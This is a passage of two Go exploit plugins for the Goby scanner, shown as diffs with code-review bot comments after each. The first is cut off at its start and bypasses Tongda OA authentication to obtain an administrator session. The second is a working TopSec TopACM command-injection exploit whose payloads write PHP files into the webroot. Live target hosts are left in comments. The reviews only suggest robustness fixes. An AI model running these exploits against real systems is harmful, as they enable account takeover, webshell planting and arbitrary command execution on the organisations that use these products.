httpclient.DoHttpRequest(host, requestConfig); err == nil { 159 + if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"codeuid\"") { 160 + return regexp.MustCompile(`\{"codeuid":"\{(.*?)}"`).FindStringSubmatch(resp.RawBody)[1] 161 + } 162 + } 163 + return "" 164 + } 165 + 166 + getTongdaPHPSESSID4564234 := func(codeuid string, host *httpclient.FixUrl) string { 167 + requestConfig := httpclient.NewPostRequestConfig("/logincheck_code.php") 168 + requestConfig.VerifyTls = false 169 + requestConfig.FollowRedirect = false 170 + requestConfig.Header.Store("Content-type", "application/x-www-form-urlencoded") 171 + requestConfig.Data = 
"UID=1&CODEUID=_PC{" + codeuid + "}" 172 + 173 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 174 + if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"status\":1") && strings.Contains(resp.RawBody, "\"url\":\"general") && strings.Contains(resp.HeaderString.String(), "Set-Cookie: PHPSESSID=") { 175 + return regexp.MustCompile(`Set-Cookie: PHPSESSID=(.*?);`).FindStringSubmatch(resp.HeaderString.String())[1] 176 + } 177 + } 178 + return "" 179 + } 180 + 181 + exploitTongda45321 := func(phpsessionid string, host *httpclient.FixUrl) bool { 182 + // 攻击 URL 183 + requestConfig := httpclient.NewGetRequestConfig("/general/") 184 + requestConfig.VerifyTls = false 185 + requestConfig.FollowRedirect = false 186 + requestConfig.Timeout = 15 187 + requestConfig.Header.Store("Cookie", "PHPSESSID="+phpsessionid) 188 + 189 + // 发送攻击请求 190 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 191 + return resp.StatusCode == 302 && strings.Contains(resp.Utf8Html, "tongdainfo") 192 + } 193 + return false 194 + } 195 + 196 + ExpManager.AddExploit(NewExploit( 197 + goutils.GetFileName(), 198 + expJson, 199 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 200 + if checkIsTongdaOA1231234(u) { 201 + codeuid := getTongdaCodeUID435345(u) 202 + if codeuid != "" { 203 + phpsessionid := getTongdaPHPSESSID4564234(codeuid, u) 204 + if phpsessionid != "" { 205 + return exploitTongda45321(phpsessionid, u) 206 + } 207 + } 208 + } 209 + 210 + return false 211 + }, 212 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 213 + 214 + if checkIsTongdaOA1231234(expResult.HostInfo) { 215 + codeuid := getTongdaCodeUID435345(expResult.HostInfo) 216 + if codeuid != "" { 217 + phpsessionid := getTongdaPHPSESSID4564234(codeuid, expResult.HostInfo) 218 + if phpsessionid != "" { 219 + if exploitTongda45321(phpsessionid, expResult.HostInfo) { 220 + 
expResult.Success = true 221 + expResult.Output = "登陆成功,使用如下 session 即可登陆:" + phpsessionid 222 + } 223 + } 224 + } 225 + } 226 + 227 + return expResult 228 + }, 229 + )) 230 + } 231 + 232 + // http://14.18.236.21:8000/ -
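Review bot: `getTongdaCodeUID435345` (file lines 159-160) and `getTongdaPHPSESSID4564234` (lines 174-175) index `FindStringSubmatch(...)[1]` after only a substring check, so a response that contains `"codeuid"` without the `{...}` shape, or a `Set-Cookie: PHPSESSID=` header with no trailing `;`, makes the regex return nil and the scanner panics with an index out of range; guard it as `if m := re.FindStringSubmatch(resp.RawBody); len(m) > 1 { return m[1] }` and fall through to `return ""`. Both regexes are compiled on every call — hoist them to package scope with `regexp.MustCompile` per the usual Go convention. Note that the detection callback (lines 199-211) is not passive: it completes the `UID=1` login at line 171 and obtains a live administrative session on the target for every scan, which deserves a comment and, if the product exposes a logout endpoint, a cleanup request. Line 232 commits a live host address as a comment; remove it.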
1 + package exploits 2 + 3 + import ( 4 + "git.gobies.org/goby/goscanner/goutils" 5 + "git.gobies.org/goby/goscanner/jsonvul" 6 + "git.gobies.org/goby/goscanner/scanconfig" 7 + "git.gobies.org/goby/httpclient" 8 + "net/url" 9 + "strings" 10 + ) 11 + 12 + func init() { 13 + expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. 
At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"[email protected]","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","Recommendation":"<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the manufacturer has not released a security patch. 
Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></span><br></p>","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"<p>天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。<br></p><p>天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。<br></p>","Recommendation":"<p>目前厂商还未发布安全补丁,请关注官方更新。<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></p>","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 
16px;\">天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。</span><br></p>","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. 
Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Recommendation":"<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></span><br></p>","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}` 14 + 15 + exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool { 16 + // 攻击 URL 17 + requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd)) 18 + requestConfig.VerifyTls = false 19 + requestConfig.FollowRedirect = false 20 + requestConfig.Timeout = 15 21 + 22 + // 发送攻击请求 23 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 24 + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") { 25 + return true 26 + } 27 + } 28 + return false 29 + } 30 + 31 + checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { 32 + // 攻击 URL 33 + requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php") 34 + requestConfig.VerifyTls = false 35 + requestConfig.FollowRedirect = false 36 + requestConfig.Timeout = 15 37 + 38 + // 发送攻击请求 39 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 40 + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, 
fileContent) { 41 + return true 42 + } 43 + } 44 + return false 45 + } 46 + 47 + ExpManager.AddExploit(NewExploit( 48 + goutils.GetFileName(), 49 + expJson, 50 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 51 + 52 + // 生成随机文件名 53 + randomFileName := goutils.RandomHexString(6) 54 + 55 + // 漏洞攻击包,POC 使用自删除的文件 56 + // <?php echo md5(233);unlink(__FILE__); 57 + if exploitTopACM092348783482("echo PD9waHAgZWNobyBtZDUoMjMzKTt1bmxpbmsoX19GSUxFX18pOw== |base64 -d >/var/www/html/"+randomFileName+".php", u) { 58 + return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u) 59 + } 60 + 61 + return false 62 + }, 63 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 64 + 65 + cmd := ss.Params["cmd"].(string) 66 + 67 + if exploitTopACM092348783482(cmd, expResult.HostInfo) { 68 + expResult.Success = true 69 + expResult.Output = "命令执行成功" 70 + } 71 + 72 + return expResult 73 + }, 74 + )) 75 + } 76 + 77 + // https://heiwado.cn:8443/ -
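Review bot: The unchecked type assertion `cmd := ss.Params["cmd"].(string)` in the second callback passed to ExpManager.AddExploit (file line 65) panics when the "cmd" parameter is absent or is not a string, which aborts the whole scan instead of reporting the step as failed; prefer `cmd, ok := ss.Params["cmd"].(string)` followed by `if !ok || cmd == "" { return expResult }`. The embedded metadata also needs a pass: the top-level "Description" and "Translation.EN.Description" each contain the same two paragraphs twice, so one copy should be dropped. The closure names exploitTopACM092348783482 and checkExistFileTopACM092348783482 carry a numeric suffix that is not explained anywhere; a short comment on their first definition stating why the suffix is there (presumably to keep the names unique across sibling exploit files, but that is inferred) would spare the next maintainer the guess. Finally, the trailing `// https://heiwado.cn:8443/` on the last line looks like a leftover test-host reference and should be removed from the committed file rather than shipped alongside the plugin.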